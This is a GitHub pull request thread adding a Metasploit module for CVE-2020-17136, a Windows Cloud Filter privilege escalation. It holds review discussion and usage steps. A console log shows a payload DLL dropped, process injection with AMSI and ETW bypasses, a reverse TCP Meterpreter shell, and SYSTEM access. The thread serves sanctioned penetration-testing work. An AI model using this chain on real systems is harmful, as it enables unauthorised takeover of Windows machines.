Create module for CVE-2020-17136: Cloud Filter Arbitrary File Creation EoP #14585
Conversation
…ts first ready state using a different DLL hijack I found during research
gwillcox-r7
added
module
needs-docs
needs-linting
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
|
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit: You can automate most of these changes with the Please update your branch after these have been made, and reach out if you have any problems. |
|
Still need to do the following items before this is ready to review:
|
…ngly, plus rework the module description
gwillcox-r7
added
docs
and removed
needs-linting
|
Alright most of these changes should now be done, but we do need to double check that the module still works on a 32 bit system as expected and update the documentation accordingly. Exploit code should be updated so that users can at least try the exploit against a 32 bit system, but atm I haven't checked if this will work. |
|
Alright on closer inspection it seems that the original PoC code was only designed to work on x64. Whilst we could in theory support x86, it would require some reworking of the original exploit to get this to work correctly, and x86 is dying out in popularity these days, so I'm going to leave this for the moment. If there is a demand for x86 down the line we can look into adding support for targeting x86 down the line. |
| This module abuses this vulnerability to perform a DLL hijacking attack against the Microsoft Storage | ||
| Spaces SMP service, which grants the attacker code execution as the `NETWORK SERVICE` user. The module | ||
| then uses RPCSS named pipe impersonation to obtain a `SYSTEM` token and assign it to the current process, | ||
| thereby allowing the attacker to execute arbitrary code as the `SYSTEM` user. |
There was a problem hiding this comment.
This is only accurate in the default case that you have setup. Since this isn't handled by the module (but rather the AutoRunScript you set), if the user for example selects a shell payload, they'll be stuck in the NETWORK SERVICE account. That should probably be reflected here by stating the user should really use a meterpreter payload to get the full elevation and either keep the default AutoRunScript option, or run getsystem themselves later on.
There was a problem hiding this comment.
Good point, however the module does have a SessionTypes option set to meterpreter, so the expectation here is that one would already have a Meterpreter session before using this exploit. I can adjust this to also include shell and update the explanation if this would make more sense though.
There was a problem hiding this comment.
The SessionTypes option has no relation to the types of payloads that can be used. That field defines what session types are compatible to run the module, not what payloads the module can use.
Most likely the user will select Meterpreter, but there isn't anything stopping them from selecting windows/shell/reverse_tcp for example and I see no reason why that wouldn't work except you'd get the permissions of NETWORK SERVICE and wouldn't be able to run the exploit again from that session.
There was a problem hiding this comment.
Huh wasn't aware of that thanks for clarifying. I'll update this so long now to correct that so that both shells can be allowed and will update the documentation accordingly with a more appropriate explanation.
external/source/exploits/CVE-2020-17136/POC_CloudFilter_ArbitraryFile_EoP/Program.cs
Outdated
Show resolved
Hide resolved
| if sysinfo['Architecture'] != 'x64' | ||
| fail_with(Failure::NoTarget, 'This module currently only supports targeting x64 systems!') | ||
| end |
There was a problem hiding this comment.
You probably want to account for running in a WOW64 context too.
There was a problem hiding this comment.
Thought this was doing this by preventing our exploit from being run under WOW64 as this has not been tested yet? Are you suggesting the exploit should be configured to also run on WOW64? Little confused what you want changed here and need a bit more clarity.
…e to not overwrite datastore hash. Also use service_hash over manually starting the service.
|
@smcintyre-r7 All issues should now be addressed, and the documentation updated where needed to reflect new changes. Please let me know if there is anything else that needs changing. |
There was a problem hiding this comment.
Code changes look good and I've tested this and it is reliably working.
Windows 10 v1909 x64
msf6 exploit(windows/local/cve_2020_17136) > sessions -i 7
[*] Starting interaction with 7...
meterpreter > getuid
Server username: DESKTOP-RTCRBEV\aliddle
meterpreter > sysinfo
Computer : DESKTOP-RTCRBEV
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > background
[*] Backgrounding session 7...
msf6 exploit(windows/local/cve_2020_17136) > show options
Module options (exploit/windows/local/cve_2020_17136):
Name Current Setting Required Description
---- --------------- -------- -----------
AMSIBYPASS true yes Enable Amsi bypass
ETWBYPASS true yes Enable Etw bypass
SESSION 7 yes The session to run this module on.
WAIT 5 no Time in seconds to wait
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows DLL Dropper
msf6 exploit(windows/local/cve_2020_17136) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. A vulnerable Windows 10 v1909 build was detected!
[*] Dropping payload dll at C:\Windows\Temp\CjSVEAibkPXJlzsZ.dll and registering it for cleanup...
[*] Running module against DESKTOP-RTCRBEV
[*] Launching notepad.exe to host CLR...
[+] Process 4380 launched.
[*] Reflectively injecting the Host DLL into 4380..
[*] Injecting Host into 4380...
[*] Host injected. Copy assembly into 4380...
[*] Assembly copied.
[*] Executing...
[*] Start reading output
[+] Sync connection key: 3046210014384
[+] Done
[*] End output.
[+] Execution finished.
[*] Sending stage (200262 bytes) to 192.168.159.30
[*] Meterpreter session 11 opened (192.168.159.128:4444 -> 192.168.159.30:50969) at 2021-01-11 17:08:23 -0500
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > getsystem
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
meterpreter > sysinfo
Computer : DESKTOP-RTCRBEV
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
I'm going to land this here pretty soon.
Release NotesNew module |
gwillcox-r7
added
the
rn-modules
|
Thx @gwillcox-r7 for this handy module :) However it fails for me with: By changing:
ps: maybe not the good place to talk about that. Redirect me if needed. |
|
@ddhouine Thanks for letting us know, I spotted the issue and will get a patch to fix it submitted soon. |
|
Just since in case this helps anyone here are the results from testing on 20H2: Windows 10 20H2 x64 |
|
@gwillcox-r7 Just a heads-up that I edited your comment to have an extra newline so that it formats correctly 👍 |
This PR adds in support for exploiting CVE-2020-17136, an arbitrary file write vulnerability within
cldflt.sys. For a more complete explanation of this vuln, see https://bugs.chromium.org/p/project-zero/issues/detail?id=2082&q=CVE-2020-17136&can=1 and https://attackerkb.com/topics/1yvp3hVNSN/cve-2020-17136?referrer=github.Suffice to say the vuln arises due to a lack of appropriate permission handling when creating placeholder files, which are used within the Cloud Filter driver used by OneDrive to create temporary files to be synced with the cloud at a later date, and we can abuse this to create files that are owned by our low privileged user in directories that our low privileged user shouldn't be able to write to, all cause the filter driver, aka
cldflt.sys, will create the file as the kernel itself.There are a bunch of limitations that go into this exploit, most of which are not important for this discussion, however its important to note a few things:
Microsoft Storage Spaces SMPservice rather than the usual Fax service DLL hijack we had be using previously. Why? Well this DLL hijack still requires admin privileges to create the file as needed in theC:\Windows\System32directory, but unlike the Fax DLL hijack, we don't need to reboot the system to remove the file, and once we have exploited the target, we can immediately clean up the file. Even better, the service itself stops itself after we get our shell. Its a win-win-win all around 🥳Verification
List the steps needed to make sure this thing works
msfconsolegetsystemdoes not get you aSYSTEMshell.use exploit/windows/local/cve_2020_17136set session *session id*runSYSTEMuser